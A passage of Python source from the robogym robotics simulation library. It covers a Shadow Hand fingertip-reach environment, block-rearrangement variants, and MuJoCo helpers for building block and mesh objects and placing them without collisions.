@classmethod
def build_goal_generation(
cls, constants, mujoco_simulation: ReachSimulation
) -> GoalGenerator:
""" Construct a goal generation object """
goal_simulation = ReachSimulation.build(n_substeps=mujoco_simulation.n_substeps)
sim = goal_simulation.mj_sim
# Make sure fingers are separated.
# For transfer, want to make sure post-noise locations are achievable.
sim.model.geom_margin[:] = sim.model.geom_margin + 0.002
from robogym.envs.dactyl.goals.shadow_hand_reach_fingertip_pos import (
FingertipPosGoal,
)
return FingertipPosGoal(mujoco_simulation, goal_simulation)
@classmethod
def build_simulation(cls, constants, parameters):
return ReachSimulation.build(n_substeps=constants.mujoco_substeps)
@classmethod
def build_robot(cls, mujoco_simulation, physical):
return mujoco_simulation.shadow_hand
def _render_callback(self, _sim, _viewer):
""" Set a render callback """
goal_fingertip_pos = self._goal["fingertip_pos"].reshape(-1, 3)
for finger_idx, site in enumerate(FINGERTIP_SITE_NAMES):
goal_pos = goal_fingertip_pos[finger_idx]
site_id = _sim.model.site_name2id(f"target_{site}")
_sim.data.site_xpos[site_id] = goal_pos
def _reset(self):
super()._reset()
self.constants.success_pause_range_s = (0.0, 0.5)
def apply_wrappers(self, **wrapper_params):
"""
Apply wrappers to the environment.
"""
self.constants: ReachEnvConstants
env = util.ClipActionWrapper(self)
if self.constants.active_finger is not None:
env = dactyl.FingerSeparationWrapper(
env, active_finger=self.constants.active_finger
)
if self.constants.randomize:
env = randomizations.RandomizedActionLatency(env)
env = randomizations.RandomizedBodyInertiaWrapper(env)
env = randomizations.RandomizedTimestepWrapper(env)
env = randomizations.RandomizedRobotFrictionWrapper(env)
env = randomizations.RandomizedGravityWrapper(env)
env = dactyl.RandomizedPhasespaceFingersWrapper(env)
env = dactyl.RandomizedRobotDampingWrapper(env)
env = dactyl.RandomizedRobotKpWrapper(env)
noise_levels = DEFAULT_NOISE_LEVELS
else:
noise_levels = NO_NOISE_LEVELS
# must happen before angle observation wrapper
env = randomizations.RandomizeObservationWrapper(env, levels=noise_levels)
if self.constants.randomize:
env = dactyl.FingersFreezingPhasespaceMarkers(env)
env = randomizations.ActionNoiseWrapper(env)
env = util.SmoothActionWrapper(
env
) # this gets applied before noise is added (important)
env = util.RelativeGoalWrapper(env)
env = util.UnifiedGoalObservationWrapper(env, goal_parts=["fingertip_pos"])
env = util.ClipObservationWrapper(env)
env = util.ClipRewardWrapper(env)
env = util.PreviousActionObservationWrapper(env)
env = util.DiscretizeActionWrapper(
env, n_action_bins=self.constants.n_action_bins
)
# Note: Recording wrapper is removed here to favor simplicity.
return env
make_simple_env = functools.partial(ReachEnv.build, apply_wrappers=False)
make_env = ReachEnv.build
```
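For reference, a hypothetical usage sketch of the entry points exported above; the exact build signatures are not verified here and the defaults are assumed to work out of the box:
```python
# Hypothetical usage sketch; argument defaults and the gym-style step interface
# are assumptions based on the RobotEnv.build entry points above.
from robogym.envs.dactyl.reach import make_env, make_simple_env

env = make_env()              # fully wrapped env (randomizations, discretized actions, ...)
raw_env = make_simple_env()   # same env built with apply_wrappers=False
obs = env.reset()
obs, reward, done, info = env.step(env.action_space.sample())
```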
#### File: envs/rearrange/blocks_duplicate.py
```python
from typing import List
from robogym.envs.rearrange.blocks import BlockRearrangeEnv
from robogym.envs.rearrange.simulation.base import ObjectGroupConfig
class DuplicateBlockRearrangeEnv(BlockRearrangeEnv):
def _sample_random_object_groups(
self, dedupe_objects: bool = False
) -> List[ObjectGroupConfig]:
"""
Create one group of block objects with a random color.
Overwrite the object groups info to contain only one group for all the blocks.
"""
object_groups = super()._sample_random_object_groups()
num_objects = self.parameters.simulation_params.num_objects
first_object_group = object_groups[0]
first_object_group.count = num_objects
first_object_group.object_ids = list(range(num_objects))
object_groups = [first_object_group]
return object_groups
make_env = DuplicateBlockRearrangeEnv.build
```
#### File: envs/rearrange/blocks_pickandplace.py
```python
from robogym.envs.rearrange.blocks import BlockRearrangeEnv
from robogym.envs.rearrange.common.base import RearrangeEnvConstants
from robogym.envs.rearrange.goals.pickandplace import PickAndPlaceGoal
from robogym.envs.rearrange.simulation.blocks import BlockRearrangeSim
class BlocksPickAndPlaceEnv(BlockRearrangeEnv):
@classmethod
def build_goal_generation(
cls, constants: RearrangeEnvConstants, mujoco_simulation: BlockRearrangeSim
):
return PickAndPlaceGoal(mujoco_simulation, constants.goal_args)
make_env = BlocksPickAndPlaceEnv.build
```
#### File: rearrange/common/utils.py
```python
import collections
import glob
import itertools
import json
import logging
import os
from copy import deepcopy
from functools import lru_cache
from typing import Callable, Dict, List, NamedTuple, Optional, Tuple, Union
import _jsonnet
import numpy as np
import trimesh
from collision import Poly, Vector, collide
from mujoco_py import MjSim, const
from numpy.random import RandomState
from robogym.mujoco.mujoco_xml import ASSETS_DIR, MujocoXML
from robogym.utils.env_utils import InvalidSimulationError
from robogym.utils.mesh import get_vertices_bounding_box, subdivide_mesh
from robogym.utils.misc import robogym_path
from robogym.utils.rotation import mat2quat, quat2mat, quat_conjugate, uniform_quat
MATERIAL_DIR = robogym_path("envs", "rearrange", "materials")
NumType = Union[int, float]
class PlacementArea(NamedTuple):
"""The offset of the placement area, which is in the lower left corner"""
offset: Tuple[float, float, float]
"""The full-size of the placement area (note that we do NOT use half-size convention here)"""
size: Tuple[float, float, float]
def recursive_dict_update(dictionary, update):
for k, v in update.items():
if isinstance(v, collections.abc.Mapping):
dictionary[k] = recursive_dict_update(dictionary.get(k, {}), v)
else:
dictionary[k] = v
return dictionary
def sample_group_counts(
random_state: RandomState, total: int, lam_low: float = 1.0, lam_high: float = 8.0
) -> List[int]:
"""
Sample a list of integers which sum up to `total`.
The probability of sampling the integer k decays exponentially, p(k) ∝ exp(-k * lam),
where lam is a hyperparam sampled from a range [lam_low, lam_high).
:param random_state: numpy random state
:param total: the exact sum the sampled numbers must add up to.
:param lam_low: lower bound for lambda in exponential decay.
:param lam_high: higher bound for lambda in exponential decay.
:return:
"""
current_max = total
counts = []
while current_max > 0:
candidates = range(1, current_max + 1)
lam = random_state.uniform(lam_low, lam_high)
probs = np.array([np.exp(-i * lam) for i in candidates])
probs /= sum(probs)
selected = random_state.choice(candidates, p=probs)
counts.append(selected)
current_max -= selected
assert sum(counts) == total
return counts
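# Illustrative behaviour (hypothetical numbers): with total=6 the sampler might return
# [1, 2, 1, 1, 1] or [3, 1, 2]; small counts dominate because p(k) ~ exp(-k * lam),
# and the returned counts always sum exactly to `total` (asserted above).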
def stabilize_objects(mujoco_simulation, n_steps: int = 100):
"""
Stabilize objects.
"""
# Store original damping value for objects.
damping = mujoco_simulation.get_object_damping()
# Decrease damping value to make object stabilize faster.
mujoco_simulation.set_object_damping(1e-3)
# Step simulation to let object stabilize.
for _ in range(n_steps):
mujoco_simulation.step()
# Restore damping value.
mujoco_simulation.set_object_damping(damping)
mujoco_simulation.forward()
def make_openai_block(name: str, object_size: np.ndarray) -> MujocoXML:
""" Creates a block with OPENAI letters on it faces.
:param name: The name of the block
:param object_size: The size of the block (3-dimensional). This is half-size as per Mujoco
convention
"""
default_object_size = 0.0285
default_letter_offset = 0.0009
# scale face meshes properly
scale = object_size / default_object_size
letter_offset = default_letter_offset * scale
def to_str(x: np.ndarray):
return " ".join(map(str, x.tolist()))
face_pos = {
"top": {
"body": to_str(np.array([0, 0, object_size[2]])),
"geom": to_str(np.array([0, 0, -letter_offset[2]])),
},
"bottom": {
"body": to_str(np.array([0, 0, -object_size[2]])),
"geom": to_str(np.array([0, 0, letter_offset[2]])),
},
"back": {
"body": to_str(np.array([0, object_size[1], 0])),
"geom": to_str(np.array([0, -letter_offset[1], 0])),
},
"right": {
"body": to_str(np.array([object_size[0], 0, 0])),
"geom": to_str(np.array([-letter_offset[0], 0, 0])),
},
"front": {
"body": to_str(np.array([0, -object_size[1], 0])),
"geom": to_str(np.array([0, letter_offset[1], 0])),
},
"left": {
"body": to_str(np.array([-object_size[0], 0, 0])),
"geom": to_str(np.array([letter_offset[0], 0, 0])),
},
}
face_euler = {
"top": to_str(np.array([np.pi / 2, 0, np.pi / 2])),
"bottom": to_str(np.array([np.pi / 2, 0, np.pi / 2])),
"back": to_str(np.array([0, 0, np.pi / 2])),
"right": to_str(np.array([0, 0, 0])),
"front": to_str(np.array([0, 0, -np.pi / 2])),
"left": to_str(np.array([0, 0, np.pi])),
}
def face_xml(_name: str, _face: str, _c: str):
xml = f"""
<body name="{_face}:{_name}" pos="{face_pos[_face]['body']}">
<geom name="letter_{_c}:{_name}" mesh="{_name}{_c}" euler="{face_euler[_face]}"
pos="{face_pos[_face]['geom']}" type="mesh" material="{_name}letter"
conaffinity="0" contype="0" />
</body>
"""
return xml
size_string = " ".join(map(str, list(object_size)))
scale_string = " ".join(map(str, list(scale)))
xml_source = f"""
<mujoco>
<asset>
<material name="{name}letter" specular="1" shininess="0.3" rgba="1 1 1 1"/>
<mesh name="{name}O" file="{ASSETS_DIR}/stls/openai_cube/O.stl"
scale="{scale_string}" />
<mesh name="{name}P" file="{ASSETS_DIR}/stls/openai_cube/P.stl"
scale="{scale_string}" />
<mesh name="{name}E" file="{ASSETS_DIR}/stls/openai_cube/E.stl"
scale="{scale_string}" />
<mesh name="{name}N" file="{ASSETS_DIR}/stls/openai_cube/N.stl"
scale="{scale_string}" />
<mesh name="{name}A" file="{ASSETS_DIR}/stls/openai_cube/A.stl"
scale="{scale_string}" />
<mesh name="{name}I" file="{ASSETS_DIR}/stls/openai_cube/I.stl"
scale="{scale_string}" />
</asset>
<worldbody>
<body name="{name}">
<geom name="{name}" size="{size_string}" type="box"
rgba="0.0 0.0 0.0 0.0" material="block_mat"/>
<joint name="{name}:joint" type="free"/>
{face_xml(name, "top", "O")}
{face_xml(name, "bottom", "P")}
{face_xml(name, "back", "E")}
{face_xml(name, "right", "N")}
{face_xml(name, "front", "A")}
{face_xml(name, "left", "I")}
</body>
</worldbody>
</mujoco>
"""
return MujocoXML.from_string(xml_source)
def make_block(name: str, object_size: np.ndarray) -> MujocoXML:
"""Creates a block.
:param name: The name of the block
:param object_size: The size of the block (3-dimensional). This is half-size as per Mujoco
convention
"""
xml_source = f"""
<mujoco>
<worldbody>
<body name="{name}" pos="0.0 0.0 0.0">
<geom type="box" rgba="0.0 0.0 0.0 0.0" material="block_mat"/>
<joint name="{name}:joint" type="free"/>
</body>
</worldbody>
</mujoco>
"""
xml = MujocoXML.from_string(xml_source).set_objects_attr(
tag="geom", size=object_size
)
return xml
def make_blocks_and_targets(
num_objects: int, block_size: Union[float, np.ndarray], appearance: str = "standard"
) -> List[Tuple[MujocoXML, MujocoXML]]:
if isinstance(
block_size, (int, float, np.integer, np.floating)
) or block_size.shape == (1,):
block_size = np.tile(block_size, 3)
assert block_size.shape == (
3,
), f"Bad block_size: {block_size}, expected float, np.ndarray(1,) or np.ndarray(3,)"
if appearance == "standard":
make_block_fn = make_block
elif appearance == "openai":
make_block_fn = make_openai_block
xmls: List[Tuple[MujocoXML, MujocoXML]] = []
for i in range(num_objects):
# add the block
block_xml = make_block_fn(f"object{i}", block_size.copy())
xmls.append((block_xml, make_target(block_xml)))
return xmls
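# Note on block_size handling above: a scalar or shape-(1,) value is tiled to shape (3,),
# so make_blocks_and_targets(2, 0.02) and make_blocks_and_targets(2, np.array([0.02] * 3))
# produce the same geometry. Sizes are half-sizes, per the Mujoco convention.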
def get_combined_mesh(files: List[str]) -> trimesh.Trimesh:
return trimesh.util.concatenate(
[trimesh.load(os.path.join(ASSETS_DIR, "stls", file)) for file in files]
)
def make_mesh_object(name: str, files: List[str], scale: float) -> MujocoXML:
# Center mesh properly by offsetting with center position of combined mesh.
mesh = get_combined_mesh(files)
pos = -mesh.center_mass * scale
pos_string = " ".join(map(str, pos))
scale_string = " ".join(map(str, [scale] * 3))
assets = [
f'<mesh file="{file}" name="{name}-{idx}" scale="{scale_string}" />'
for idx, file in enumerate(files)
]
geoms = [
f'<geom type="mesh" mesh="{name}-{idx}" pos="{pos_string}"/>'
for idx in range(len(files))
]
assets_xml = "\n".join(assets)
geoms_xml = "\n".join(geoms)
xml_source = f"""
<mujoco>
<asset>
{assets_xml}
</asset>
<worldbody>
<body name="{name}" pos="0.0 0.0 0.0">
{geoms_xml}
<joint name="{name}:joint" type="free"/>
</body>
</worldbody>
</mujoco>
"""
return MujocoXML.from_string(xml_source)
def make_target(xml):
xml = deepcopy(xml)
xml = (
xml.remove_objects_by_tag("joint")
.add_name_prefix("target:", exclude_attribs=["material", "mesh", "class"])
.set_objects_attr(tag="geom", contype=0, conaffinity=0)
)
return xml
def get_all_vertices(sim, object_name, subdivide_threshold=None) -> np.ndarray:
"""
Return all vertices for given object.
:param sim: The MjSim instance.
:param object_name: The object name.
:param subdivide_threshold: If provided, subdivide mesh into smaller faces.
See subdivide_mesh for detail of this parameter.
:return: Array of all vertices for this object.
"""
all_verts: List[np.ndarray] = []
all_faces: List[Optional[np.ndarray]] = []
object_rot_mat = quat2mat(
quat_conjugate(mat2quat(sim.data.get_body_xmat(object_name)))
)
geom_ids = geom_ids_of_body(sim, object_name)
for geom_id in geom_ids:
pos = sim.model.geom_pos[geom_id]
quat = quat_conjugate(sim.model.geom_quat[geom_id])
mat = quat2mat(quat)
# Get all vertices associated with the current geom.
verts = get_geom_vertices(sim, geom_id)
faces = get_geom_faces(sim, geom_id)
# Translate from geom's to body's coordinate frame.
geom_ref_verts = verts @ mat
geom_ref_verts = pos + geom_ref_verts
all_verts.append(geom_ref_verts)
all_faces.append(faces)
if subdivide_threshold is not None and all(f is not None for f in all_faces):
# We can only subdivide mesh with faces.
mesh = trimesh.util.concatenate(
[
trimesh.Trimesh(vertices=verts, faces=faces)
for verts, faces in zip(all_verts, all_faces)
]
)
verts = subdivide_mesh(mesh.vertices, mesh.faces, subdivide_threshold)
else:
verts = np.concatenate(all_verts, axis=0)
return verts @ object_rot_mat
def get_geom_vertices(sim, geom_id):
geom_type = sim.model.geom_type[geom_id]
geom_size = sim.model.geom_size[geom_id]
if geom_type == const.GEOM_BOX:
dx, dy, dz = geom_size
return np.array(list(itertools.product([dx, -dx], [dy, -dy], [dz, -dz])))
elif geom_type in (const.GEOM_SPHERE, const.GEOM_ELLIPSOID):
if geom_type == const.GEOM_SPHERE:
r = [geom_size[0]] * 3
else:
r = geom_size[:3]
# https://stats.stackexchange.com/a/30622
vertices = []
phi = np.linspace(0, np.pi * 2, 20)
cos_theta = np.linspace(-1, 1, 20)
for p, c in itertools.product(phi, cos_theta):
x = np.sqrt(1 - c ** 2) * np.cos(p)
y = np.sqrt(1 - c ** 2) * np.sin(p)
z = c
vertices.append(np.array([x, y, z]))
return np.array(vertices) * r
elif geom_type in (const.GEOM_CYLINDER, const.GEOM_CAPSULE):
# We treat cylinder and capsule the same.
r, h = geom_size[0], geom_size[2]
points = np.array(
[[r * np.cos(x), r * np.sin(x), 0.0] for x in np.linspace(0, np.pi * 2, 50)]
)
# Shift the circle of points along the z axis to the two end caps.
return np.concatenate([points + [0.0, 0.0, h], points - [0.0, 0.0, h]])
elif geom_type == const.GEOM_MESH:
return sim.model.mesh_vert[mesh_vert_range_of_geom(sim, geom_id)]
else:
raise AssertionError(f"Unexpected geom type {geom_type}")
def get_geom_faces(sim, geom_id):
if sim.model.geom_type[geom_id] != const.GEOM_MESH:
return None
data_id = sim.model.geom_dataid[geom_id]
face_adr = sim.model.mesh_faceadr[data_id]
face_num = sim.model.mesh_facenum[data_id]
return sim.model.mesh_face[range(face_adr, face_adr + face_num)]
def get_mesh_bounding_box(sim, object_name) -> Tuple[float, float]:
""" Returns the bounding box of a mesh body. If the block is rotated in the world frame,
the rotation is applied and the tightest axis-aligned bounding box is returned.
"""
all_verts = get_all_vertices(sim, object_name)
pos, size, _ = get_vertices_bounding_box(all_verts)
return pos, size
def get_block_bounding_box(sim, object_name) -> Tuple[float, float]:
""" Returns the bounding box of a block body. If the block is rotated in the world frame,
the rotation is applied and the tightest axis-aligned bounding box is returned.
"""
geom_ids = geom_ids_of_body(sim, object_name)
assert len(geom_ids) == 1, f"Expected exactly one geom in {object_name}, got {len(geom_ids)}."
geom_id = geom_ids[0]
size = sim.model.geom_size[geom_id]
pos = sim.model.geom_pos[geom_id]
quat = quat_conjugate(mat2quat(sim.data.get_body_xmat(object_name)))
pos, size = rotate_bounding_box((pos, size), quat)
return pos, size
class MeshGeom:
"""A little helper class for generating random mesh geoms."""
def __init__(
self,
mesh_path: str,
mesh: trimesh.Trimesh,
pos: np.array,
quat: np.array,
scale: np.array,
parent: Optional["MeshGeom"] = None,
):
self.mesh_path = mesh_path
self.mesh = mesh
self.pos = pos
self.quat = quat
self.scale = scale
self.parent = parent
self.children: List[MeshGeom] = []
def to_geom_xml(self, name: str, idx: int):
pos_str = " ".join([str(x) for x in self.pos])
quat_str = " ".join([str(x) for x in self.quat])
return f'<geom type="mesh" mesh="{name}:mesh-{idx}" name="{name}:geom-{idx}" pos="{pos_str}" quat="{quat_str}" />'
def to_mesh_xml(self, name: str, idx: int):
scale_str = " ".join([str(x) for x in self.scale])
return f'<mesh file="{self.mesh_path}" name="{name}:mesh-{idx}" scale="{scale_str}" />'
def min_max_xyz(self):
# We already applied the scaling and rotation to the mesh vertices, so we only need
# to apply the offset here.
transformed_vertices = self.pos + self.mesh.vertices
min_xyz = np.min(transformed_vertices, axis=0)
max_xyz = np.max(transformed_vertices, axis=0)
return min_xyz, max_xyz
def make_composed_mesh_object(
name: str,
primitives: List[str],
random_state: np.random.RandomState,
mesh_size_range: tuple = (0.01, 0.1),
attachment: str = "random",
object_size: Optional[float] = None,
) -> MujocoXML:
"""
Composes an object out of mesh primitives by combining them in a random but systematic
way. In the resulting object, all meshes are guaranteed to be connected.
:param name: The name of the resulting object.
:param primitives: A list of STL files that will be used as primitives in the provided order.
:param random_state: The random state used for sampling.
:param mesh_size_range: Each mesh is randomly resized (iid per dimension) but each side is
guaranteed to be within this size. This is full-size, not half-size.
:param attachment: How primitives are connected. If "random", the parent geom is randomly
selected from the already placed geoms. If "last", the geom that was placed last is used.
:param object_size: If this is not None, the final object will be re-scaled so that the longest
side has exactly object_size half-size. This parameter is in half-size, as per Mujoco
convention.
:return: a MujocoXML object.
"""
assert 0 <= mesh_size_range[0] <= mesh_size_range[1]
assert attachment in ["random", "last"]
def compute_pos_and_size(geoms):
min_max_xyzs = np.array([geom.min_max_xyz() for geom in geoms])
min_xyz = np.min(min_max_xyzs[:, 0, :], axis=0)
max_xyz = np.max(min_max_xyzs[:, 1, :], axis=0)
size = (max_xyz - min_xyz) / 2.0
pos = min_xyz + size
return pos, size
geoms: List[MeshGeom] = []
for i, mesh_path in enumerate(primitives):
# Load mesh.
mesh = trimesh.load(mesh_path)
# Scale randomly but such that the mesh is within mesh_size_range.
min_scale = mesh_size_range[0] / mesh.bounding_box.extents
max_scale = mesh_size_range[1] / mesh.bounding_box.extents
assert min_scale.shape == max_scale.shape == (3,)
scale = random_state.uniform(min_scale, max_scale) * random_state.choice(
[-1, 1], size=3
)
assert scale.shape == (3,)
scale_matrix = np.eye(4)
np.fill_diagonal(scale_matrix[:3, :3], scale)
# Rotate randomly.
quat = uniform_quat(random_state)
rotation_matrix = np.eye(4)
rotation_matrix[:3, :3] = quat2mat(quat)
# Apply transformations. Apply scaling first since we computed the scale
# in the original reference frame! In principle, we could also sheer the
# object, but we currently do not do this.
mesh.apply_transform(scale_matrix)
mesh.apply_transform(rotation_matrix)
if len(geoms) == 0:
pos = -mesh.center_mass
else:
if attachment == "random":
parent_geom = random_state.choice(geoms)
elif attachment == "last":
parent_geom = geoms[-1]
else:
raise ValueError()
# We sample 10 points here because sample_surface sometimes returns fewer points
# than we requested (unclear why).
surface_pos = trimesh.sample.sample_surface(parent_geom.mesh, 10)[0][0]
pos = parent_geom.pos + (surface_pos - mesh.center_mass)
geom = MeshGeom(mesh_path=mesh_path, mesh=mesh, pos=pos, quat=quat, scale=scale)
geoms.append(geom)
# Shift everything so that the reference of the body is at the very center of the composed
# object. This is very important.
off_center_pos, _ = compute_pos_and_size(geoms)
for geom in geoms:
geom.pos -= off_center_pos
# Ensure that the object origin is exactly at the center.
assert np.allclose(compute_pos_and_size(geoms)[0], 0.0)
# Resize object.
if object_size is not None:
_, size = compute_pos_and_size(geoms)
# Apply global scale (so that ratio is not changed and longest side is exactly
# object_size).
ratio = object_size / np.max(size)
for geom in geoms:
geom.scale *= ratio
geom.pos *= ratio
geoms_str = "\n".join([g.to_geom_xml(name, idx) for idx, g in enumerate(geoms)])
meshes_str = "\n".join([g.to_mesh_xml(name, idx) for idx, g in enumerate(geoms)])
xml_source = f"""
<mujoco>
<asset>
{meshes_str}
</asset>
<worldbody>
<body name="{name}" pos="0 0 0">
{geoms_str}
<joint name="{name}:joint" type="free"/>
</body>
</worldbody>
</mujoco>
"""
return MujocoXML.from_string(xml_source)
def geom_ids_of_body(sim: MjSim, body_name: str) -> List[int]:
object_id = sim.model.body_name2id(body_name)
object_geomadr = sim.model.body_geomadr[object_id]
object_geomnum = sim.model.body_geomnum[object_id]
return list(range(object_geomadr, object_geomadr + object_geomnum))
def mesh_vert_range_of_geom(sim: MjSim, geom_id: int):
assert sim.model.geom_type[geom_id] == const.GEOM_MESH
data_id = sim.model.geom_dataid[geom_id]
vert_adr = sim.model.mesh_vertadr[data_id]
vert_num = sim.model.mesh_vertnum[data_id]
return range(vert_adr, vert_adr + vert_num)
def mesh_face_range_of_geom(sim: MjSim, geom_id: int):
assert sim.model.geom_type[geom_id] == const.GEOM_MESH
data_id = sim.model.geom_dataid[geom_id]
face_adr = sim.model.mesh_faceadr[data_id]
face_num = sim.model.mesh_facenum[data_id]
return range(face_adr, face_adr + face_num)
def update_object_body_quat(sim: MjSim, body_name: str, new_quat: np.ndarray):
body_id = sim.model.body_name2id(body_name)
sim.model.body_quat[body_id][:] = new_quat.copy()
def _is_valid_proposal(o1_x, o1_y, object1_index, bounding_boxes, placements):
o1_x += bounding_boxes[object1_index, 0, 0]
o1_y += bounding_boxes[object1_index, 0, 1]
# Check if the object collides with any of the already placed objects. We use half-sizes,
# but the collision check uses full sizes, which is why we multiply by 2 here.
o1_w, o1_h, _ = bounding_boxes[object1_index, 1]
object1 = Poly.from_box(Vector(o1_x, o1_y), o1_w * 2.0, o1_h * 2.0)
for object2_index in range(len(placements)):
# Don't care about z placement
o2_x, o2_y, _ = placements[object2_index]
o2_x += bounding_boxes[object2_index, 0, 0]
o2_y += bounding_boxes[object2_index, 0, 1]
# Don't care about object depth.
o2_w, o2_h, _ = bounding_boxes[object2_index, 1]
object2 = Poly.from_box(Vector(o2_x, o2_y), o2_w * 2.0, o2_h * 2.0)
if collide(object1, object2):
return False
return True
def _place_objects(
object_bounding_boxes: np.ndarray,
table_dimensions: Tuple[np.ndarray, np.ndarray, float],
placement_area: PlacementArea,
get_proposal: Callable[[int], Tuple[NumType, NumType]],
max_placement_trial_count: int,
max_placement_trial_count_per_object: int,
run_collision_check: bool = True,
) -> Tuple[np.ndarray, bool]:
"""
Wrapper for the _place_objects_trial() function. Calls _place_objects_trial() repeatedly
until it returns a valid placement, calling it at most `max_placement_trial_count` times.
"""
assert max_placement_trial_count >= 1
assert max_placement_trial_count_per_object >= 1
for _ in range(max_placement_trial_count):
placements, is_valid = _place_objects_trial(
object_bounding_boxes,
table_dimensions,
placement_area,
get_proposal,
max_placement_trial_count_per_object,
run_collision_check,
)
if is_valid:
return placements, is_valid
return placements, False
def _place_objects_trial(
object_bounding_boxes: np.ndarray,
table_dimensions: Tuple[np.ndarray, np.ndarray, float],
placement_area: PlacementArea,
get_proposal: Callable[[int], Tuple[NumType, NumType]],
max_placement_trial_count_per_object: int,
run_collision_check: bool = True,
) -> Tuple[np.ndarray, bool]:
"""
Place objects within rectangular boundaries with given get proposal function.
:param object_bounding_boxes: matrix of bounding boxes (num_objects, 2, 3) where [:, 0, :]
contains the center position of the bounding box in Cartesian space relative to the body's
frame of reference and where [:, 1, :] contains the half-width, half-height, and half-depth
of the object.
:param table_dimensions: Tuple (table_pos, table_size, table_height) defining dimension of
the table where
table_pos: position of the table.
table_size: half-size of the table along (x, y, z).
table_height: height of the table.
:param placement_area: the placement area in which to place objects.
:param get_proposal: Function to get a proposal of target position for given object. This
function takes in object index and return proposed (x, y) position.
:param max_placement_trial_count_per_object: If set, will give up re-generating new proposal
after this number is hit.
:param run_collision_check: If true, run collision to check if proposal is valid.
:return: np.ndarray of size (num_objects, 3) where columns are x, y, z coordinates of objects
relative to the world frame and a boolean indicating whether the placement is valid.
"""
offset_x, offset_y, _ = placement_area.offset
width, height, _ = placement_area.size
table_pos, table_size, table_height = table_dimensions
def _get_global_placement(placement: np.ndarray):
return placement + [offset_x, offset_y, 0.0] - table_size + table_pos
# place the objects one by one, resampling if a collision with previous objects happens
n_objects = object_bounding_boxes.shape[0]
placements: List[Tuple[NumType, NumType, NumType]] = []
for i in range(n_objects):
placement_trial_count = 0
# Reference is to (xmin, ymin, zmin) of table.
prop_z = object_bounding_boxes[i, 1, -1] + 2 * table_size[-1]
prop_z -= object_bounding_boxes[i, 0, -1]
while True:
prop_x, prop_y = get_proposal(i)
placement = _get_global_placement(np.array([prop_x, prop_y, prop_z]))
b1_x, b1_y = placement[:2]
if not run_collision_check or _is_valid_proposal(
b1_x, b1_y, i, object_bounding_boxes, placements
):
break
placement_trial_count += 1
if placement_trial_count > max_placement_trial_count_per_object:
return np.zeros((n_objects, len(placement))), False
placements.append(placement)
return np.array(placements), True
def place_objects_in_grid(
object_bounding_boxes: np.ndarray,
table_dimensions: Tuple[np.ndarray, np.ndarray, float],
placement_area: PlacementArea,
random_state: np.random.RandomState,
max_num_trials: int = 5,
) -> Tuple[np.ndarray, bool]:
"""
Place objects within rectangular boundaries by dividing the placement area into a grid of cells
of equal size, and then randomly sampling cells for each object to be placed in.
:param object_bounding_boxes: matrix of bounding boxes (num_objects, 2, 3) where [:, 0, :]
contains the center position of the bounding box in Cartesian space relative to the body's
frame of reference and where [:, 1, :] contains the half-width, half-height, and half-depth
of the object.
:param table_dimensions: Tuple (table_pos, table_size, table_height) defining dimension of
the table where
table_pos: position of the table.
table_size: half-size of the table along (x, y, z).
table_height: height of the table.
:param placement_area: the placement area in which to place objects.
:param random_state: numpy random state to use to shuffle placement positions
:param max_num_trials: maximum number of trials to run (a trial will fail if there is overlap
detected between any two placements; generally this shouldn't happen with this algorithm)
:return: Tuple[np.ndarray, bool], where the array is of size (num_objects, 3) with columns set
to the x, y, z coordinates of objects relative to the world frame, and the boolean
indicates whether the placement is valid.
"""
offset_x, offset_y, _ = placement_area.offset
width, height, _ = placement_area.size
table_pos, table_size, table_height = table_dimensions
def _get_global_placement(placement: np.ndarray):
return placement + [offset_x, offset_y, 0.0] - table_size + table_pos
# 1. Determine the number of rows and columns of the grid, based on the largest object width
# and height.
total_object_area = 0.0
n_objects = object_bounding_boxes.shape[0]
max_obj_height = 0.0
max_obj_width = 0.0
for i in range(n_objects):
# Bounding boxes are in half-sizes.
obj_width = object_bounding_boxes[i, 1, 0] * 2
obj_height = object_bounding_boxes[i, 1, 1] * 2
max_obj_height = max(max_obj_height, obj_height)
max_obj_width = max(max_obj_width, obj_width)
object_area = obj_width * obj_height
total_object_area += object_area
n_columns = int(width // max_obj_width)
n_rows = int(height // max_obj_height)
n_cells = n_columns * n_rows
cell_width = width / n_columns
cell_height = height / n_rows
if n_cells < n_objects:
# Cannot find a valid placement via this method; give up.
logging.warning(
f"Unable to fit {n_objects} objects into placement area with {n_cells} cells"
)
return np.zeros(shape=(n_objects, 3)), False
for trial_i in range(max_num_trials):
placement_valid = True
placements: List[Tuple[NumType, NumType, NumType]] = []
# 2. Initialize an array with all valid cell coordinates.
# Create an array of shape (n_rows, n_columns, 2) where each element contains the row,col
# coord
coords = np.dstack(np.mgrid[0:n_rows, 0:n_columns])
# Create a shuffled list where every entry is a valid (row, column) coordinate.
coords = np.reshape(coords, (n_rows * n_columns, 2))
random_state.shuffle(coords)
coords = list(coords)
# 3. Place each object into a randomly selected cell.
for object_idx in range(n_objects):
row, col = coords.pop()
pos, size = object_bounding_boxes[object_idx]
prop_x = cell_width * col + size[0] - pos[0]
prop_y = cell_height * row + size[1] - pos[1]
# Reference is to (xmin, ymin, zmin) of table.
prop_z = object_bounding_boxes[object_idx, 1, -1] + 2 * table_size[-1]
prop_z -= object_bounding_boxes[object_idx, 0, -1]
placement = _get_global_placement(np.array([prop_x, prop_y, prop_z]))
b1_x, b1_y = placement[:2]
if not _is_valid_proposal(
b1_x, b1_y, object_idx, object_bounding_boxes, placements
):
placement_valid = False
logging.warning(f"Trial {trial_i} failed on object {object_idx}")
break
placements.append(placement)
if placement_valid:
assert (
len(placements) == n_objects
), "There should be a placement for every object"
break
return np.array(placements), placement_valid
def place_objects_with_no_constraint(
object_bounding_boxes: np.ndarray,
table_dimensions: Tuple[np.ndarray, np.ndarray, float],
placement_area: PlacementArea,
max_placement_trial_count: int,
max_placement_trial_count_per_object: int,
random_state: np.random.RandomState,
) -> Tuple[np.ndarray, bool]:
"""
Place objects within rectangular boundaries without any extra constraint.
:param object_bounding_boxes: matrix of bounding boxes (num_objects, 2, 3) where [:, 0, :]
contains the center position of the bounding box in Cartesian space relative to the body's
frame of reference and where [:, 1, :] contains the half-width, half-height, and half-depth
of the object.
:param table_dimensions: Tuple (table_pos, table_size, table_height) defining dimension of
the table where
table_pos: position of the table.
table_size: half-size of the table along (x, y, z).
table_height: height of the table.
:param placement_area: the placement area in which to place objects
:param max_placement_trial_count: To prevent an infinite placement loop,
max_placement_trial_count should be set to a finite positive number.
:param max_placement_trial_count_per_object: To prevent an infinite placement loop,
max_placement_trial_count_per_object should be set to a finite positive number.
:param random_state: numpy RandomState to use for sampling
:return: np.ndarray of size (num_objects, 3) where columns are x, y, z coordinates of objects
